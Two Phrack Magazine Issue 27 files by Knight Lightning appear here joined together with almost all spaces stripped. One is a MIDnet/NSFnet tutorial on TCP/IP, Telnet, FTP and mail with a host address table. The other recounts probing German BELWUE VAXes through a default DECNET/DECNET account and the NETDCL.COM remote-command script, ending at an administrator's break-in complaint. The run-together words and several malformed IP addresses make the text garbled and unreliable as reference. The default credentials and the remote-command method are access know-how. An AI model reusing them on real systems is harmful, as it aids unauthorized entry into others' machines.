122.PhrackMagazineVol.3,Issue27byKnightLightning Prologue IfyouarenotalreadyfamiliarwithNSFnet,Iwouldsuggestthatyouread: "Frontiers"(PhrackInc.,VolumeTwo,Issue24,File4of13),anddefinitely; "NSFnet:NationalScienceFoundationNetwork"(PhrackInc.,VolumeThree, Issue26,File4of11). Introduction MIDNETisaregionalcomputernetworkthatispartoftheNSFnet,theNational ScienceFoundationNetwork.Currently,elevenmidUnitedStatesuniversities areconnectedtoeachotherandtotheNSFnetviaMIDnet: UAUniversityofArkansasatFayetteville ISUIowaStateUniversityatAmes UIUniversityofIowaatIowaCity KSUKansasStateUniversityatManhattan KUUniversityofKansasatLawrence UMCUniversityofMissouriatColumbia WUWashingtonUniversityatSt.Louis,Missouri UNLUniversityofNebraskaatLincoln OSUOklahomaStateUniversityatStillwater UTUniversityofTulsa(Oklahoma) OUUniversityofOklahomaatNorman Researchersatanyoftheseuniversitiesthathavefundedgrantscanaccessthe sixsupercomputercentersfundedbytheNSF: JohnVonNeumanSupercomputerCenter NationalCenterforAtmosphericResearch CornellNationalSupercomputerFacility NationalCenterforSupercomputingApplications PittsburghSupercomputingCenter SanDiegoSupercomputingCenter Inaddition,researchersandscientistscancommunicatewitheachotherovera vastworldwidecomputernetworkthatincludestheNSFnet,ARPAnet,CSnet, BITnet,andothersthatyouhavereadaboutinTheFutureTranscendentSaga. Pleasereferto"Frontiers"(PhrackInc.,VolumeTwo,Issue24,File4of13) formoredetails. MIDnetisjustoneofseveralregionalcomputernetworksthatcomprisethe NSFnetsystem.Althoughalloftheseregionalcomputernetworksworkthesame, MIDnetistheonlyonethatIhavedirectaccesstoandsothisfileiswritten fromaMIDnetpointofview.Forpeoplewhohaveaccesstotheotherregional networksofNSFnet,theonlyrealdifferencesdepictedinthisfilethatwould notapplytotheotherregionalnetworksaretheuniversitiesthatareservedby MIDnetasopposedto: NYSERnetinNewYorkState SURAnetinthesoutheasternUnitedStates SEQSUInetinTexas BARRnetintheSanFranciscoarea MERITinMichigan (Thereareothersthatarecurrentlybeingconstructed.) TheseregionalnetworksallhookintotheNSFnetbackbone,whichisanetwork thatconnectsthesixsupercomputercenters.Forexample,apersonatKansas StateUniversitycanconnectwithasupercomputerviaMIDnetandtheNSFnet backbone.ThatresearchercanalsosendmailtocolleaguesattheUniversityof DelawarebyusingMIDnet,NSFnetandSURAnet.Eachuniversityhasitsownlocal computernetworkwhichconnectsoncampuscomputersaswellasprovidingameans

toconnectingtoaregionalnetwork. SomeuniversitiesarealreadyconnectedtooldernetworkssuchasCSnet,the ARPAnetandBITnet.Inprincipal,anycampusconnectedtoanyofthesenetworks canaccessanyoneelseinanyothernetworksincetherearegatewaysbetweenthe networks. Gatewaysarespecializedcomputersthatforwardnetworktraffic,thereby connectingnetworks.Inpractice,thesewideareanetworksusedifferent networkingtechnologywhichmakeitimpossibletoprovidefullfunctionality acrossthegateways.However,mailisalmostuniversallysupportedacrossall gateways,sothatapersonataBITnetsitecansendmailmessagestoa colleagueatanARPAnetsite(oranywhereelseforthatmatter).Youshould alreadybesomewhatfamiliarwiththis,butifnotreferto;"LimboToInfinity" (PhrackInc.,VolumeTwo,Issue24,File3of13)and"InternetDomains"(Phrack Inc.,VolumeThree,Issue26,File8of11) Computernetworksrelyonhardwareandsoftwarethatallowcomputersto communicate.Thelanguagethatenablesnetworkcommunicationiscalleda protocol.Therearemanydifferentprotocolsinusetoday.MIDnetusesthe TCP/IPprotocols,alsoknownastheDOD(DepartmentofDefense)ProtocolSuite. OthernetworksthatuseTCP/IPincludeARPAnet,CSnetandtheNSFnet.Infact, alltheregionalnetworksthatarelinkedtotheNSFnetbackbonearerequiredto useTCP/IP.Atthelocalcampuslevel,TCP/IPisoftenused,althoughother protocolssuchasIBM'sSNAandDEC'sDECnetarecommon.Inordertocommunicate withacomputerviaMIDnetandtheNSFnet,acomputeratacampusmustuse TCP/IPdirectlyoruseagatewaythatwilltranslateitsprotocolsintoTCP/IP. TheInternetisaworldwidecomputernetworkthatistheconglomerationofmost ofthelargewideareanetworks,includingARPAnet,CSnet,NSFnet,andthe regionals,suchasMIDnet.Toalesserdegree,othernetworkssuchasBITnet thatcansendmailtohostsonthesenetworksareincludedaspartofthe Internet.Thishugenetworkofnetworks,theInternet,asyouhavebynowread allaboutinthepagesofPhrackInc.,isarapidlygrowingandverycomplex entitythatallowssophisticatedcommunicationbetweenscientists,students, governmentofficialsandothers.Beingapartofthiscommunityisboth excitingandchallenging. ThischapteroftheFutureTranscendentSagagivesageneraldescriptionofthe protocolsandsoftwareusedinMIDnetandtheNSFNet.Adiscussionofseveral ofthemorecommonlyusednetworkingtoolsisalsoincludedtoenableyouto makepracticaluseofthenetworkassoonaspossible. TheDODProtocolSuite TheDODProtocolSuiteincludesmanydifferentprotocols.Eachprotocolisa specificationofhowcommunicationistooccurbetweencomputers.Computer hardwareandsoftwarevendorsusetheprotocoltocreateprogramsandsometimes specializedhardwareinordertoimplementthenetworkfunctionintendedbythe protocol.Differentimplementationsofthesameprotocolexistforthevaried hardwareandoperatingsystemsfoundinanetwork. Thethreemostcommonlyusednetworkfunctionsare: MailSendingandreceivingmessages FileTransferSendingandreceivingfiles RemoteLoginLoggingintoadistantcomputer Ofthese,mailisprobablythemostcommonlyused. IntheTCP/IPworld,therearethreedifferentprotocolsthatrealizethese functions:

SMTP(SimpleMailTransferProtocol)Mail FTP(FileTransferProtocol)sendingandreceivingfiles TelnetRemotelogin Howtousetheseprotocolsisdiscussedinthenextsection.Atfirstglance,it isnotobviouswhythesethreefunctionsarethemostcommon.Afterall,mail andfiletransferseemtobethesamething.However,mailmessagesarenot identicaltofiles,sincetheyareusuallycomprisedofonlyASCIIcharacters andaresequentialinstructure.Filesmaycontainbinarydataandhave complicated,nonsequentialstructures.Also,mailmessagescanusuallytolerate someerrorsintransmissionwhereasfilesshouldnotcontainanyerrors. Finally,filetransfersusuallyoccurinasecuresetting(i.e.Theuserswho aretransferringfilesknoweachother'snamesandpasswordsandarepermitted totransferthefile,whereasmailcanbesenttoanybodyaslongastheirname isknown). Whilemailandtransferaccomplishthetransferofrawinformationfromone computertoanother,Telnetallowsadistantusertoprocessthatinformation, eitherbyloggingintoaremotecomputerorbylinkingtoanotherterminal. Telnetismostoftenusedtoremotelylogintoadistantcomputer,butitis actuallyageneralpurposecommunicationsprotocol.Ihavefounditincredibly usefuloverthelastyear.Insomeways,itcouldbeusedforagreatdealof accessbecauseyoucandirectlyconnecttoanothercomputeranywherethathas TCP/IPcapabilities,howeverpleasenotethatTelnetis*NOT*Telenet.Thereare otherfunctionsthatsomenetworksprovide,includingthefollowing: Nametoaddresstranslationfornetworks,computersandpeople Thecurrenttime Quoteofthedayorfortune Printingonaremoteprinter,oruseofanyotherremoteperipheral Submissionofbatchjobsfornoninteractiveexecution Dialoguesandconferencingbetweenmultipleusers Remoteprocedurecall(i.e.Distributingprogramexecutionoverseveral remotecomputers) Transmissionofvoiceorvideoinformation Someofthesefunctionsarestillintheexperimentalstagesandrequirefaster computernetworksthancurrentlyexist.Inthefuture,newfunctionswill undoubtedlybeinventedandexistingonesimproved. TheDODProtocolSuiteisalayerednetworkarchitecture,whichmeansthat networkfunctionsareperformedbydifferentprogramsthatworkindependently andinharmonywitheachother.Notonlyaretheredifferentprogramsbutthere aredifferentprotocols.TheprotocolsSMTP,FTPandTelnetaredescribedabove. Protocolshavebeendefinedforgettingthecurrenttime,thequoteoftheday, andfortranslatingnames.Theseprotocolsarecalledapplicationsprotocols becauseusersdirectlyinteractwiththeprogramsthatimplementthese protocols. TheTransmissionControlProtocol,TCP,isusedbymanyoftheapplication protocols.UsersalmostneverinteractwithTCPdirectly.TCPestablishesa reliableendtoendconnectionbetweentwoprocessesonremotecomputers.Data issentthroughanetworkinsmallchunkscalledpacketstoimprovereliability andperformance.TCPensuresthatpacketsarriveinorderandwithouterrors.If apacketdoeshaveerrors,TCPrequeststhatthepacketberetransmitted. Inturn,TCPcallsuponIP,InternetProtocol,tomovethedatafromonenetwork toanother.IPisstillnotthelowestlayerofthearchitecture,sincethere isusuallya"datalinklayerprotocol"belowit.Thiscanbeanyofanumber ofdifferentprotocols,twoverycommononesbeingX.25andEthernet.

FTP,TelnetandSMTParecalled"applicationprotocols",sincetheyaredirectly usedbyapplicationsprogramsthatenableuserstomakeuseofthenetwork. Networkapplicationsaretheactualprogramsthatimplementtheseprotocolsand provideaninterfacebetweentheuserandthecomputer.Animplementationofa networkprotocolisaprogramorpackageofprogramsthatprovidesthedesired networkfunctionsuchasfiletransfer.Sincecomputersdifferfromvendorto vendor(e.g.IBM,DEC,CDC),eachcomputermusthaveitsownimplementationof theseprotocols.However,theprotocolsarestandardizedsothatcomputerscan interpolateoverthenetwork(i.e.Canunderstandandprocesseachother's data).Forexample,aTCPpacketgeneratedbyanIBMcomputercanbereadand processedbyaDECcomputer. Inmanyinstances,networkapplicationsprogramsusethenameoftheprotocol. Forexample,theprogramthattransfersfilesmaybecalled"FTP"andthe programthatallowsremoteloginsmaybecalled"Telnet."Sometimesthese protocolsareincorporatedintolargerpackages,asiscommonwithSMTP.Many computershavemailprogramsthatallowusersonthesamecomputertosendmail toeachother.SMTPfunctionsareoftenaddedtothesemailprogramssothat userscanalsosendandreceivemailthroughanetwork.Insuchcases,thereis noseparateprogramcalledSMTPthattheusercanaccess,sincethemailprogram providestheuserinterfacetothisnetworkfunction. Specificimplementationofnetworkprotocols,suchasFTP,aretailoredtothe computerhardwareandoperatingsystemonwhichtheyareused.Therefore,the exactuserinterfacevariesfromoneimplementationtoanother.Forexample, theFTPprotocolspecifiesasetofFTPcommandswhicheachFTPimplementation mustunderstandandprocess.However,theseareusuallyplacedatalowlevel, ofteninvisibletotheuser,whoisgivenahighersetofcommandstouse. Thesehigherlevelcommandsarenotstandardizedsotheymayvaryfromone implementationofFTPtoanother.Forsomeoperatingsystems,notallofthese commandsmakeequalsense,suchas"ChangeDirectory,"ormayhavedifferent meanings.Thereforethespecificuserinterfacethattheuserseeswill probablydiffer. ThisfiledescribesagenericimplementationofthestandardTCP/IPapplication protocols.Usersmustconsultlocaldocumentationforspecificsattheirsites. NamesandAddressesInANetwork InDODProtocolSuite,eachnetworkisgivenauniqueidentifyingnumber.This numberisassignedbyacentralauthority,namelytheNetworkInformationCenter runbySRI,abbreviatedasSRINIC,inordertopreventmorethanonenetwork fromhavingthesamenetworknumber.Forexample,theARPAnethasnetworknumber 10whileMIDnethasalongernumber,namely128.242.Eachhostinanetworkhas auniqueidentificationsootherhostscanspecifythemunambiguously.Host numbersareusuallyassignedbytheorganizationthatmanagesthenetwork, ratherthanonecentralauthority.Hostnumbersdonotneedtobeunique throughoutthewholeInternetbuttwohostsonthesamenetworkneedtohave uniquehostnumbers. ThecombinationofthenetworknumberandthehostnumberiscalledtheIP addressofthehostandisspecifiedasa32bitbinarynumber.AllIPaddresses intheInternetareexpressibleas32bitnumbers,althoughtheyareoften writtenindotteddecimalnotation.Dotteddecimalnotationbreaksthe32bit numberintofoureightbitpartsoroctetsandeachoctetisspecifiedasa decimalnumber.Forexample,00000001isthebinaryoctetthatspecifiesthe decimalnumber1,while11000000specifies192.DotteddecimalnotationmakesIP addressesmucheasiertoreadandremember. ComputersintheInternetarealsoidentifiedbyhostnames,whicharestringsof characters,suchas"phrackvax."However,IPpacketsmustspecifythe32bitIP addressinsteadofthehostnamesosomewaytotranslatinghostnamestoIP

addressesmustexist. OnewayistohaveatableofhostnamesandtheircorrespondingIPaddresses, calledahosttable.NearlyeveryTCP/IPimplementationhassuchahosttable, althoughtheweaknessesofthismethodareforcingashifttoanewscheme calledthedomainnamesystem.InUNIXsystems,thehosttableisoftencalled "/etc/hosts."YoucanusuallyreadthisfileandfindoutwhattheIPaddresses ofvarioushostsare.Othersystemsmaycallthisfilebyadifferentnameand makeitunavailableforpublicviewing. Usersofcomputersaregenerallygivenaccountstowhichallchargesfor computerusearebilled.Evenifcomputertimeisfreeataninstallation, accountsareusedtodistinguishbetweentheusersandenforcefileprotections. Thegenericterm"username"willbeusedinthisfiletorefertothenameby whichthecomputeraccountisaccessed. IntheearlydaysoftheARPAnetwhichwasthefirstnetworktousetheTCP/IP protocols,computeruserswereidentifiedbytheirusername,followedbya commercial"at"sign(@),followedbythehostnameonwhichtheaccountexisted. Networkswerenotgivennames,perse,althoughtheIPaddressspecifieda networknumber. Forexample,"knight@phrackvax"referredtouser"knight"onhost"phrackvax." Thisdidnotspecifywhichnetwork"phrackvax"wason,althoughthatinformation couldbeobtainedbyexaminingthehosttableandtheIPaddressfor"phrackvax." (However,"phrackvax"isafictitioushostnameusedforthispresentation.) Astimewenton,everycomputeronthenetworkhadtohaveanentryinits hosttableforeveryothercomputeronthenetwork.Whenseveralnetworkslinked togethertoformtheInternet,theproblemofmaintainingthiscentralhosttable gotoutofhand.Therefore,thedomainnameschemewasintroducedtosplitup thehosttableandmakeitsmallerandeasiertomaintain. Inthenewdomainnamescheme,usersarestillidentifiedbytheirusernames, buthostsarenowidentifiedbytheirhostnameandanyandalldomainsofwhich theyareapart.Forexample,theaddress"KNIGHT@UMCVMB.MISSOURI.EDU"specifies username"KNIGHT"onhost"UMCVMB".However,host"UMCVMB"isapartofthe domain"MISSOURI""whichisinturnpartofthedomain"EDU".Thereareother domainsin"EDU",althoughonlyoneisnamed"MISSOURI".Inthedomain "MISSOURI",thereisonlyonehostnamed"UMCVMB". However,otherdomainsin"EDU"couldtheoreticallyhavehostsnamed"UMCVMB" (althoughIwouldsaythatthisisratherunlikelyinthisexample).Thusthe combinationofhostnameandallitsdomainsmakesitunique.Themethodof translatingsuchnamesintoIPaddressesisnolongerasstraightforwardas lookingupthehostnameinatable.Severalprotocolsandspecializednetwork softwarecallednameserversandresolversimplementthedomainnamescheme. NotallTCP/IPimplementationssupportdomainnamesbecauseitisrathernew.In thosecases,thelocalhosttableprovidestheonlywaytotranslatehostnamesto IPaddresses.Thesystemmanagerofthatcomputerwillhavetoputanentryinto thehosttableforeveryhostthatusersmaywanttoconnectto.Insomecases, usersmayconsultthenameserverthemselvestofindouttheIPaddressfora givenhostnameandthenusethatIPaddressdirectlyinsteadofahostname. Ihaveselectedafewnetworkhoststodemonstratehowahostsystemcanbe specifiedbyboththehostnameandhostnumericaladdress.SomeofthenodesI haveselectedarealsonodesonBITnet,perhapsevensomeoftheothersthatI donotmakeanoteofduealackofomniscientawarenessabouteachandevery singlehostsystemintheworld:) NumericalBITnet Hostname Location

18.72.0.39 ATHENA.MIT.EDU Mass.InstituteofTechnologyMIT 26.0.0.73 SRINIC.ARPA DDNNetworkInformationCenter 36.21.0.13 MACBETH.STANFORD.EDU StanfordUniversity? 36.21.0.60 PORTIA.STANFORD.EDU StanfordUniversity? 128.2.11.131 ANDREW.CMU.EDU CarnegieMellonUniv.ANDREW 128.3.254.13 LBL.GOV LawrenceBerkeleyLabrotoriesLBL 128.6.4.7 RUTGERS.RUTGERS.EDU RutgersUniversity? 1289.99.1 CUCARD.MED.COLUMBIA.EDU ColumbiaUniversity? 128.102.18.3 AMES.ARC.NASA.GOV AmesResearchCenter[NASA] 128.103.1.1 HARVARD.EDU HarvardUniversityHARVARD 128.111.24.40 HUB.UCSB.EDU Univ.OfSantaBarbara? 128.115.14.1 LLLWINKEN.LLNL.GOV LawrenceLivermoreLabratories 128.143.2.7 UVAARPA.VIRGINIA.EDU UniversityofVirginia? 128.148.128.40 BROWNVM.BROWN.EDU BrownUniversityBROWN 128.163.1 UKCC.UKY.EDU UniversityofKentuckyUKCC 128.183.10.4 NSSDCA.GSFC.NASA.GOV GoddardSpaceFlightCenter[NASA] 128.186.4.18 RAI.CC.FSU.EDU FloridaStateUniversityFSU 128.206.1.1 UMCVMB.MISSOURI.EDU Univ.ofMissouriColumbiaUMCVMB 128.208.1.15 MAX.ACS.WASHINGTON.EDU UniversityofWashingtonMAX 128.228.1.2 CUNYVM.CUNY.EDU CityUniversityofNewYorkCUNYVM 129.10.1.6 NUHUB.ACS.NORTHEASTERN.EDU NortheasternUniversityNUHUB 131.151.1.4 UMRVMA.UMR.EDU UniversityofMissouriRollaUMRVMA 192.9.9.1 SUN.COM SunMicrosystems,Inc. 192.33.18.30 VM1.NODAK.EDU NorthDakotaStateUniv.NDSUVM1 192.33.180 PLAINS.NODAK.EDU NorthDakotaStateUniv.NDSUVAX PleaseNote:NoteverysystemonBITnethasanIPaddress.Likewise,notevery systemthathasanIPaddressisonBITnet.Also,whilesomelocationslike StanfordUniversitymayhavenodesonBITnetandhavehostsontheIPaswell, thisdoesnotnecessarilyimplythatthesystemsonBITnetandonIP(theEDU domaininthiscase)arethesamesystems. Attemptstogainunauthorizedaccesstosystemsontheinternetarenot toleratedandislegallyafederaloffense.Atsomehosts,theytakethisvery seriously,especiallythegovernmenthostssuchasNASA'sGoddardSpaceFlight Center,wheretheydonotmindtellingyousoatthemainpromptwhenyou connecttotheirsystem. However,somenodesarepublicaccesstoanextent.TheDDNNetworkInformation Centercanbeusedbyanyone.Theserveranddatabasetherehaveproventobean invaluablesourceofinformationwhenlocatingpeople,systems,andother informationthatisrelatedtotheInternet. Telnet Remoteloginreferstologgingintoaremotecomputerfromaterminalconnected toalocalcomputer.TelnetisthestandardprotocolintheDODProtocolSuite foraccomplishingthis.The"rlogin"program,providedwithBerkeleyUNIX systemsandsomeothersystems,alsoenablesremotelogin. Forpurposesofdiscussion,the"localcomputer"isthecomputertowhichyour terminalisdirectlyconnectedwhilethe"remotecomputer"isthecomputeron thenetworktowhichyouarecommunicatingandtowhichyourterminalis*NOT* directlyconnected. Sincesomecomputersuseadifferentmethodofattachingterminalstocomputers, abetterdefinitionwouldbethefollowing:The"localcomputer"isthecomputer thatyouarecurrentlyusingandthe"remotecomputer"isthecomputeronthe networkwithwhichyouareorwillbecommunicating.Notethattheterms"host" and"computer"aresynonymousinthefollowingdiscussion. TouseTelnet,simplyenterthecommand:TELNET

ThepromptthatTelnetgivesis:Telnet> (However,youcanspecifywhereyouwanttoTelnettoimmediatelyandbypassthe promptsandotherdelaysbyissuingthecommand:TELNET[location].) Thereishelpavailablebytypingin?.Thisprintsalistofallthevalid subcommandsthatTelnetprovideswithaonelineexplanation. Telnet>? Toconnecttoanothercomputer,usetheopensubcommandtoopenaconnection tothatcomputer.Forexample,toconnecttothehost"UMCVMB.MISSOURI.EDU", do"openumcvmb.missouri.edu" Telnetwillresolve(i.e.Translate,thehostname"umcvmb.missouri.edu"intoan IPaddressandwillsendapackettothathostrequestinglogin.Iftheremote hostdecidestoletyouattemptalogin,itpromptsyouforyourusernameand password.Ifthehostdoesnotrespond,Telnetwill"timeout"(i.e.Waitfora reasonableamountoftimesuchas20seconds)andthenterminatewithamessage suchas"Hostnotresponding." Ifyourcomputerdoesnothaveanentryforaremotehostinitshosttableand itcannotresolvethename,youcanusetheIPaddressexplicitlyinthetelnet command.Forexample, TELNET26.0.0.73(Note:ThisistheIPaddressfortheDDNNetworkInformation Center[SRINIC.ARPA]) Ifyouaresuccessfulinloggingin,yourterminalisconnectedtotheremote host.Forallintentsandpurposes,yourterminalisdirectlyhardwiredtothat hostandyoushouldbeabletodoanythingonyourremoteterminalthatyoucan doatanylocalterminal.Thereareafewexceptionstothisrule,however. Telnetprovidesanetworkescapecharacter,suchasCONTROLT.Youcanfindout whattheescapecharacterisbyenteringthe"status"subcommand: Telnet>status Youcanchangetheescapecharacterbyenteringthe"escape"subcommand: Telnet>escape Whenyoutypeintheescapecharacter,theTelnetpromptreturnstoyourscreen andyoucanentersubcommands.Forexample,tobreaktheconnection,which usuallylogsyouofftheremotehost,enterthesubcommand"quit": Telnet>quit YourTelnetconnectionusuallybreakswhenyoulogofftheremotehost,sothe "quit"subcommandisnotusuallyusedtologoff. WhenyouareloggedintoaremotecomputerviaTelnet,rememberthatthereisa timedelaybetweenyourlocalcomputerandtheremoteone.Thisoftenbecomes apparenttouserswhenscrollingalongfileacrosstheterminalscreenandthey wishtocancelthescrollingbytypingCONTROLCorsomethingsimilar.After typingthespecialcontrolcharacter,thescrollingcontinues.Thespecial controlcharactertakesacertainamountoftimetoreachtheremotecomputer whichisstillscrollinginformation.Thusresponsefromtheremotecomputer willnotlikelybeasquickasresponsefromalocalcomputer.Onceyouare remotelyloggedon,thecomputeryouareloggedontoeffectivelybecomesyour "localcomputer,"eventhoughyouroriginal"localcomputer"stillconsidersyou loggedon.Youcanlogontoathirdcomputerwhichwouldthenbecomeyour

"localcomputer"andsoon.Asyoulogoutofeachsession,yourprevious sessionbecomesactiveagain. FileTransfer FTPistheprogramthatallowsfilestobesentfromonecomputertoanother. "FTP"standsfor"FileTransferProtocol". WhenyoustartusingFTP,acommunicationschannelwithanothercomputeronthe networkisopened.Forexample,tostartusingFTPandinitiateafiletransfer sessionwithacomputeronthenetworkcalled"UMCVMB",youwouldissuethe followingsubcommand: FTPUMCVMB.MISSOURI.EDU Host"UMCVMB"willpromptyouforanaccountnameandpassword.Ifyourloginis correct,FTPwilltellyouso,otherwiseitwillsay"loginincorrect."Try againoraborttheFTPprogram.(Thisisusuallydonebytypingaspecial controlcharactersuchasCONTROLC.The"programabort"charactervariesfrom systemtosystem.) NextyouwillseetheFTPprompt,whichis: Ftp> ThereareanumberofsubcommandsofFTP.Thesubcommand"?"willlistthese commandsandabriefdescriptionofeachone. YoucaninitiateafiletransferineitherdirectionwithFTP,eitherfromthe remotehostortotheremotehost.The"get"subcommandinitiatesafile transferfromtheremotehost(i.e.Tellstheremotecomputertosendthefile tothelocalcomputer[theoneonwhichyouissuedthe"ftp"command]).Simply enter"get"andFTPwillpromptyoufortheremotehost'sfilenameandthe (new)localhost'sfilename.Example: Ftp>get Remotefilename? theirfile localfilename? myfile Youcanabbreviatethisbytypingbothfilenamesonthesamelineasthe"get" subcommand.Ifyoudonotspecifyalocalfilename,thenewlocalfilewillbe calledthesamethingastheremotefile.ValidFTPsubcommandstogetafile includethefollowing: gettheirfilemyfile getdoc.x25 The"put"subcommandworksinasimilarfashionandisusedtosendafilefrom thelocalcomputertotheremotecomputer.Enterthecommand"put"andFTPwill promptyouforthelocalfilenameandthentheremotefilename.Ifthe transfercannotbedonebecausethefiledoesn'texistorforsomeotherreason, FTPwillprintanerrormessage. ThereareanumberofothersubcommandsinFTPthatallowyoutodomanymore things.Notallofthesearestandardsoconsultyourlocaldocumentationor typeaquestionmarkattheFTPprompt.SomefunctionsoftenbuiltintoFTP includetheabilitytolookatfilesbeforegettingorputtingthem,theability tochangedirectories,theabilitytodeletefilesontheremotecomputer,and theabilitytolistthedirectoryontheremotehost. AnintriguingcapabilityofmanyFTPimplementationsis"thirdpartytransfers."

Forexample,ifyouareloggedoncomputerAandyouwanttocausecomputerBto sendafiletocomputerC,youcanuseFTPtoconnecttocomputerBandusethe "rmtsend"command.Ofcourse,youhavetoknowusernamesandpasswordsonall threecomputers,sinceFTPneverallowsyoutopeekintosomeone'sdirectoryand filesunlessyouknowtheirusernameandpassword. The"cd"subcommandchangesyourworkingdirectoryontheremotehost.The"lcd" subcommandchangesthedirectoryonthelocalhost.ForUNIXsystems,the meaningofthesesubcommandsisobvious.Othersystems,especiallythosethatdo nothavedirectorystructuredfilesystem,maynotimplementthesecommandsor mayimplementtheminadifferentmanner. The"dir"and"ls"subcommandsdothesamething,namelylistthefilesinthe workingdirectoryoftheremotehost. The"list"subcommandshowsthecontentsofafilewithoutactuallyputtingit intoafileonthelocalcomputer.Thiswouldbehelpfulifyoujustwantedto inspectafile.Youcouldinterruptitbeforeitreachedtheendofthefileby typingCONTROLCorsomeotherspecialcharacter.ThisisdependentonyourFTP implementation. The"delete"commandcandeletefilesontheremotehost.Youcanalsomakeand removedirectoriesontheremotehostwith"mkdir"and"rmdir".The"status" subcommandwilltellyouifyouareconnectedandwithwhomandwhatthestate ofallyouroptionsare. Ifyouaretransferringbinaryfilesorfileswithanynonprintablecharacters, turnbinarymodeonbyenteringthe"binary"subcommand: binary Toresumenonbinarytransfers,enterthe"ascii"subcommand. Transferringanumberoffilescanbedoneeasilybyusing"mput"(multipleput) and"mget"(multipleget).Forexample,togeteveryfileinaparticular directory,firstissuea"cd"commandtochangetothatdirectoryandthena "mget"commandwithanasterisktoindicateeveryfile: cdsomedirectory mget* Whenyouaredone,usethe"close"subcommandtobreakthecommunicationslink. YouwillstillbeinFTP,soyoumustusethe"bye"subcommandtoexitFTPand returntothecommandlevel.The"quit"subcommandwillclosetheconnection andexitfromFTPatthesametime. Mail Mailisthesimplestnetworkfacilitytouseinmanyways.Allyouhavetodois tocreateyourmessage,whichcanbedonewithafileeditororonthespurof themoment,andthensendit.UnlikeFTPandTelnet,youdonotneedtoknowthe passwordoftheusernameontheremotecomputer.Thisissobecauseyoucannot changeoraccessthefilesoftheremoteusernorcanyouusetheiraccountto runprograms.Allyoucandoistosendamessage. Thereisprobablyaprogramonyourlocalcomputerwhichdoesmailbetweenusers onthatcomputer.Suchaprogramiscalledamailer.Thismayormaynotbethe waytosendorreceivemailfromothercomputersonthenetwork,although integratedmailersaremoreandmorecommon.UNIXmailerswillbeusedasan exampleinthisdiscussion. NotethattheprotocolwhichisusedtosendandreceivemailoveraTCP/IP networkiscalledSMTP,the"SimpleMailTransferProtocol."Typically,you

willnotuseanyprogramcalledSMTP,butratheryourlocalmailprogram. UNIXmailersareusuallyusedbyinvokingaprogramnamed"mail".Toreceivenew mail,simplytype"mail".ThereareseveralvarietiesofUNIXmailersin existence.Consultyourlocaldocumentationfordetails.Forexample,the command"manmail"printsoutthemanualpagesforthemailprogramonyour computer. Tosendmail,youusuallyspecifytheaddressoftherecipientonthemail command.Forexample:"mailknight@umcvmb.missouri.edu"willsendthefollowing messagetousername"knight"onhost"umcvmb". Youcanusuallytypeinyourmessageonelineatatime,pressingRETURNafter eachlineandtypingCONTROLDtoendthemessage.Otherfacilitiestoinclude alreadyexistingfilessometimesexist.Forexample,BerkeleyUNIX'sallowyou toentercommandssimilartothefollowingtoincludeafileinyourcurrent mailmessage: rmyfile Inthisexample,thecontentsof"myfile"areinsertedintothemessageatthis point. MostUNIXsystemsallowyoutosendafilethroughthemailbyusinginput redirection.Forexample: mailknight@umcvmb.missouri.edu<myfile Inthisexample,thecontentsof"myfile"aresentasamessageto"knight"on "umcvmb." NotethatinmanyUNIXsystemstheonlydistinctionbetweenmailboundfor anotheruseronthesamecomputerandanotheruseronaremotecomputeris simplytheaddressspecified.Thatis,thereisnohostnameforlocal recipients.Otherwise,mailfunctionsinexactlythesameway.Thisiscommon forintegratedmailpackages.Thesystemknowswhethertosendthemaillocally orthroughthenetworkbasedontheaddressandtheuserisshieldedfromany otherdetails. "TheQuestForKnowledgeIsWithoutEnd..." 123.PhrackMagazineVol.3,Issue27byKnightLightning PrologueForNoneVMSUsers DECnetisthenetworkforDECmachines,inmostcasesyoucansayVAX's.DECnet allowsyoutodo: email filetransfer remotelogin remotecommand remotejobentry PHONE PHONEisaninteractivecommunicationbetweenusersandisequaltoTALKonUNIX ora"deluxe"CHATonVM/CMS. BELWUE,theuniversitynetworkofthestateBadenWuerttemberginWestGermany contains(besidesothernetworks)aDECnetwithabout400VAX's.OneveryVAX thereisstandardaccountcalledDECNETwithpw:=DECNET,whichisnotreachable viaremotelogin.ThisaccountisprovidedforseveralDECnetUtilitiesandasa pseudoguestaccount.TheDECNETaccounthasveryrestrictedprivileges:You cannoteditafileormakeanotherremotelogin.

TheHELPisequippedbythesystemandissimilartotheMANcommandonUNIX. MoreinformationonDECnetcanbefoundin"LookingAroundInDECnet"byDeep ThoughtinthisveryissueofPhrackInc. Here,attheUniversityofUlm,wehavean*incredibly*ignorantcomputercenter staff,withanevenbiggerlackofsystemliterature(besidesthe80kgof VAX/VMSmanuals).Theactivemaysearchforinformationbyhimself,whichis overthelevelof"run,""FORTRAN,"or"logout."MygoodluckthatIhaveother accountsintheBELWUEDECnet,wheremoreinformationisofferedfortheusers. IamaregularstudentinUlmandallmyaccountsarecompletelylegaland correspondingtotheGermanlaws.Idon'tcallmyselfa"hacker,"Ifeelmore likea"user"(...it'smoreadefiningproblem). IntheHELPmenuinahostinTuebingenIfoundthefilenetdcl.comandthe correspondingexplanation,whichsendscommandstotheDECNETAccountofother VAX'sandexecutesthemthere(remotecommand).TheexplanationintheHELPmenu wasidiotproofthereforeforme,too:) Withthecommand"$mcrncpshowknownnodes"youcanobtainalistofall netwideactiveVAX's,asisgenerallyknown,andsoIpingedalltheseVAX'sto lookformoreinformationforaknowledgethirstyuser.With"help","dir"and othersimilarcommandsIlookaroundonthoseDECnetaccounts,alwayswatching fortopicsrelatedtotheBELWUEnetwork.It'sapity,that2/3ofallVAX's havelockedtheDECNETAccountforNETDCL.COM.Theirsystemmanagersare probablyafraidofunauthorizedaccess,butIcannotimaginehowtherecouldbe suchanunauthorizedaccess,becauseyoucannotlogonthisaccountnochance fortrojanhorses,etc. SomesystemmanagerscalledmebackafterIvisitedtheirVAXtochatwithme aboutthenetworkandaskedmeiftheycouldhelpmeinanyway.Onesysopfrom StuttgartevensentmeaversionofNETDCL.COMfortheULTRIXoperationsystem. Then,afteramonth,theHORRORcameovermeinshapeofathefollowing mail: From:TUEBINGEN::SYSTEM31MAY198915:31:11.38 To:FRAMSTAG CC: Subj:don'tmakeanycrap,oryou'llbekickedout! From:ITTGPX::SYSTEM29MAY198916:46 To:TUEBINGEN::SYSTEM Subj:Systembreakingin01May1989 TothesystemmanageroftheComputerTUEBINGEN, OnMay1st1989wehadaSystembreakingininourDECNETaccount,whichstarted fromyourmachine.ByhelpofouraccountingweascertainedyouruserFRAMSTAG tohaveemulatedaninteractivelogononourbackbonenodeandoneverymachine ofourVAXclusterwiththe"trojanhorse"NETDCL.COM.Giveusthisuser'sname 